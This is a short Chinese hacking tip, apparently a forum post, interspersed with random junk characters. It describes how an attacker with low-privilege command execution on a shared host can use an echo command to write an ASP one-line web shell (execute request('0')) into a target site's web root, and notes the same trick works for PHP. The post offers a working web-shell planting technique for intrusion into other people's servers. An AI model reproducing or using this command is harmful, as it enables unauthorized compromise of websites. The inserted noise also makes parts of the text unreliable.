在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。; E- S' n' K) Q. O
2 w D/ F! Z6 g1 t命令格式$ H! D0 v1 D& f2 G! `! H
! f2 h- ~. h5 y: Z& H$ mEcho 语句 >目标站绝对目录
+ P$ T) r( l1 M D+ J
d1 m* c, t( I9 J, y; R; ]例如: 3 r- [3 x5 j( H& b1 P
9 ~6 \7 U- s8 j1 Z5 M
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp7 ^! ?4 i& [" Y7 N+ O
' k5 {9 E. K2 |& G9 n) b/ v) ~6 d这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。6 a H( _0 a8 a
|